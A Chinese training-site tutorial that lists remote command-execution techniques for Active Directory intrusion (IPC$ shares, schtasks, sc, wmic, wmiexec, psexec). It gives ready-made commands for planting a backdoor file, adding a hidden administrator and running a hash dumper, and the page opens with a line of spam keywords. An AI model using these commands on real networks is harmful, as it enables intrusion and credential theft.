久久精品国产亚洲高清|精品日韩中文乱码在线|亚洲va中文字幕无码久|伊人久久综合狼伊人久久|亚洲不卡av不卡一区二区|精品久久久久久久蜜臀AV|国产精品19久久久久久不卡|国产男女猛烈视频在线观看麻豆

千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機(jī)構(gòu)

手機(jī)站
千鋒教育

千鋒學(xué)習(xí)站 | 隨時隨地免費學(xué)

千鋒教育

掃一掃進(jìn)入千鋒手機(jī)站

領(lǐng)取全套視頻
千鋒教育

關(guān)注千鋒學(xué)習(xí)站小程序
隨時隨地免費學(xué)習(xí)課程

當(dāng)前位置:首頁  >  技術(shù)干貨  > 內(nèi)網(wǎng)滲透之域滲透命令執(zhí)行總結(jié)

內(nèi)網(wǎng)滲透之域滲透命令執(zhí)行總結(jié)

來源:千鋒教育
發(fā)布人:syq
時間: 2022-06-07 17:36:00 1654594560

  AD的全稱是Active Directory:活動目錄

  域(Domain)是Windows網(wǎng)絡(luò)中獨立運行的單位,域之間相互訪問則需要建立信任關(guān)系(即Trust Relation)。信任關(guān)系是連接在域與域之間的橋梁。當(dāng)一個域與其他域建立了信任關(guān)系后兩個域之間不但可以按需要相互進(jìn)行管理,還可以跨網(wǎng)分配文件和打印機(jī)等設(shè)備資源,使不同的域之間實現(xiàn)網(wǎng)絡(luò)資源的共享與管理,以及相互通信和數(shù)據(jù)傳輸。

域滲透命令執(zhí)行總結(jié)

  在域滲透場景中,我們已經(jīng)進(jìn)入內(nèi)網(wǎng),會遇到大量的開放端口和服務(wù),弱密碼空密碼,這個時候我們可以使用它們已經(jīng)開啟的服務(wù)選擇對應(yīng)的方式進(jìn)行命令執(zhí)行。本文對ad域滲透中常見的命令執(zhí)行方式進(jìn)行一個總結(jié)。

  ipc

  前提

  開啟ipc共享

  配置本地安全策略:開始->運行-> secpol.msc->本地策略->安全選項->網(wǎng)絡(luò)訪問:共享>和本地帳戶的安全模型>經(jīng)典-本地用戶進(jìn)行身份驗證

  配置本地組策略:運行g(shù)pedit.msc ——計算機(jī)配置——Windows設(shè)置——安全設(shè)置——本地策略 ——安全選項——用戶賬戶控制:以管理員批準(zhǔn)模式運行所有管理員——禁用。

  文件共享

  寫入后門文件

  net use z: \\目標(biāo)IP\c$ "passwd" /user:"admin"

  或

  copy hack.bat \\目標(biāo)ip\c$

  #刪除連接

  net use \\目標(biāo)IP\ipc$ /del

  后續(xù)使用下面的方式執(zhí)行

  at(win10不可用)

  定時任務(wù)執(zhí)行命令

  前提

  開啟windows Event log服務(wù),開啟Task Scheduler服務(wù)

  其余條件同ipc

  命令執(zhí)行

  at \\170.170.64.19 23:00 c:\windows\system32\calc.exe

  at \\170.170.64.19 1 delete /yes #刪除本機(jī)1號任務(wù)

  schtasks

  前提

  開啟windows Event log服務(wù),開啟Task Scheduler服務(wù)

  其余條件同ipc

  schtasks /create /tn firstTask /tr "c:\windows\system32\cmd.exe /c calc" /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwd

  schtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwd

  schtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd

  telnet

  前提

  開啟telnet服務(wù)

  命令執(zhí)行

  telnet 目標(biāo)ip

  之后可執(zhí)行命令

  sc

  windows2003

  windows XP

  命令執(zhí)行

  sc \\170.170.64.19 create testSC binPath= "cmd.exe /c start c:\windows\hack.bat"

  sc \\170.170.64.19 start testSC

  sc \\170.170.64.19 delete testSC

  wmic

  前提

  開啟wmi服務(wù),135端口

  命令執(zhí)行

  wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c calc.exe"

  wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c net user test 123456 /add && net localgroup administrators test /add"

  wmiexec.vbs(需要安裝)

  前提

  開啟wmi服務(wù),135端口

  安裝

  下載vmiexec.vbs

  命令執(zhí)行

  cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwd

  cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd "cmdkey /list"

  cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd c:\programdata\test.bat

  #其他參數(shù)

  -wait5000 表示這個命令等待5s后再讀取結(jié)果,用于運行“運行時間長”的命令。

  -persist 程序會在后臺運行,不會有結(jié)果輸出,而且會返回這個命令進(jìn)程的 PID,方便結(jié)束進(jìn)程,用于運行 nc 或者木馬程序。

  impackets wmiexec(需要安裝)

  前提

  開啟wmi服務(wù),135端口

  安裝

  git clone https://github.com/SecureAuthCorp/impacket/

  pip install -r requirements.txt

  pip install impacket

  命令執(zhí)行

  #獲取遠(yuǎn)程計算機(jī)交互式shell

  python wmiexec.py admin:passwd@170.170.64.19

  psexec(需要安裝)

  前提

  開啟admin$共享

  安裝

  在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

  下載安裝

  命令執(zhí)行

  #打開交互式shell

  psexec \\170.170.64.19 -u admin -p passwd cmd

  #執(zhí)行單條命令

  psexec \\170.170.64.19 -u admin -p passwd -s cmd /c "calc.exe"

  #拷貝文件到遠(yuǎn)程計算機(jī)并執(zhí)行

  psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe

  #其他參數(shù)

  –accepteula 第一次運行會彈框,輸入這個參數(shù)便不會彈框

  -s 以 “nt authority\system” 權(quán)限運行遠(yuǎn)程進(jìn)程

  -h 如果可以,以管理員權(quán)限運行遠(yuǎn)程進(jìn)程

  -d 不等待程序執(zhí)行完就返回,請只對非交互式應(yīng)用程序使用此選項

  \\ip 可以替換成 @ip.txt (存放多個 ip 的文本),可以批量執(zhí)行命令

  遠(yuǎn)程桌面

  前提

  開啟遠(yuǎn)程桌面,3389端口

  命令執(zhí)行

  可直接通過mstsc進(jìn)入目標(biāo)系統(tǒng)。

  更多關(guān)于"IT網(wǎng)絡(luò)安全培訓(xùn)"的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓(xùn)服務(wù)經(jīng)驗,采用全程面授高品質(zhì)、高體驗培養(yǎng)模式,擁有國內(nèi)一體化教學(xué)管理及學(xué)員服務(wù),助力更多學(xué)員實現(xiàn)高薪夢想。

tags:
聲明:本站稿件版權(quán)均屬千鋒教育所有,未經(jīng)許可不得擅自轉(zhuǎn)載。
10年以上業(yè)內(nèi)強(qiáng)師集結(jié),手把手帶你蛻變精英
請您保持通訊暢通,專屬學(xué)習(xí)老師24小時內(nèi)將與您1V1溝通
免費領(lǐng)取
今日已有369人領(lǐng)取成功
劉同學(xué) 138****2860 剛剛成功領(lǐng)取
王同學(xué) 131****2015 剛剛成功領(lǐng)取
張同學(xué) 133****4652 剛剛成功領(lǐng)取
李同學(xué) 135****8607 剛剛成功領(lǐng)取
楊同學(xué) 132****5667 剛剛成功領(lǐng)取
岳同學(xué) 134****6652 剛剛成功領(lǐng)取
梁同學(xué) 157****2950 剛剛成功領(lǐng)取
劉同學(xué) 189****1015 剛剛成功領(lǐng)取
張同學(xué) 155****4678 剛剛成功領(lǐng)取
鄒同學(xué) 139****2907 剛剛成功領(lǐng)取
董同學(xué) 138****2867 剛剛成功領(lǐng)取
周同學(xué) 136****3602 剛剛成功領(lǐng)取
相關(guān)推薦HOT
怎樣開抖音小店帶貨賺錢

隨著直播帶貨的火熱,越來越多的人開始嘗試通過抖音小店來開展帶貨業(yè)務(wù)。抖音小店是抖音直播帶貨的配套,可以讓用戶在購買直播中產(chǎn)品時就實現(xiàn)購...詳情>>

2023-10-08 15:06:36
能不能幫我打開抖音小店店鋪呢怎么弄

抖音小店是近年來非常火爆的一個網(wǎng)絡(luò)業(yè)務(wù),也是提供了很多商業(yè)機(jī)會的平臺。對于一個創(chuàng)業(yè)者而言,開設(shè)抖音小店是一個不錯的選擇。但是,許多小店...詳情>>

2023-10-08 15:01:21
藍(lán)v抖音小店怎么開通店鋪

藍(lán)v抖音小店是一個非常熱門的電商平臺,它可以讓賣家在抖音上開設(shè)自己的店鋪,從而出售自己的商品。隨著抖音的不斷發(fā)展壯大,越來越多的賣家希...詳情>>

2023-10-08 14:51:53
抖音小店怎么更改類目名稱

抖音小店是現(xiàn)在非?;馃岬囊环N網(wǎng)店形態(tài),許多小生意也從中獲得了收益。但是隨著經(jīng)營時間的增長,小店也需要對自己的類目名稱進(jìn)行更改,因為這可...詳情>>

2023-10-08 14:46:50
抖音小店怎么合作賣貨

抖音小店作為一種新型的電商形式,近年來在國內(nèi)市場上逐漸火熱起來,成為了許多年輕人賺取收入的途徑之一。因為抖音作為當(dāng)前最流行的短視頻平臺...詳情>>

2023-10-08 14:35:49